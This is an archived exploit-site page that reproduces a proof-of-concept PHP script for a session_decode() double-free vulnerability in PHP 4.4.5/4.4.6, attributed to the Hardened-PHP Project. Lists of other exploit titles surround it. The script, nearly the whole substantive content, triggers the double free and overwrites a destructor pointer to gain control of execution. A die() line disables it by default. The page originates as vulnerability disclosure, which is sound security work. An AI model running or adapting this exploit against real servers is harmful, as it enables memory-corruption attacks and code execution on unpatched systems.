exploits , vulnerabilities , articles , PHP 4.4.5 / 4.4.6 session

2007-06-15 XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-08 NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit
2007-06-07 Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
2007-06-06 Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
2007-05-24 cpCommerce <= 1.1.0 (category.php id_category) SQL Injection Exploit
2007-05-24 Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit

2007-03-27

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

Rated as : Critical

<?php
 
////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___ 
//
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
//
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
//
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
//
  //                                                                   
//
  //         Proof of concept code from the Hardened-PHP Project       
//
  //                   (C) Copyright 2007 Stefan Esser                 
//
  //                                                                   
//
 
////////////////////////////////////////////////////////////////////////
  //     PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability    
//
 
////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  ini_set("session.serialize_handler", "php");
  session_start();

  $varname = str_repeat("D", 39);
  $$varname = &$_SESSION;

  // Trigger the double free
  
  session_decode($varname.'|i:0;');
  $_________________x =
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ";
  $_________________a = array("OneElement");

  // Now x and a point to the same memory. Therefore x can be used to
modify a

  // Overwrite pointer to the destructor  
  $_________________x[8*4+0] = chr(0x55);
  $_________________x[8*4+1] = chr(0x66);
  $_________________x[8*4+2] = chr(0x77);
  $_________________x[8*4+3] = chr(0x88);
  
  // Trigger the destruction
  unset($_________________a);
?>
securitydot.net - 2007-03-27

Exploits - newest 10 RSS | More

2007-06-15 57250 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34178 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42393 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29323 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19764 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16700 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19398 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16586 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33599 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17223 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC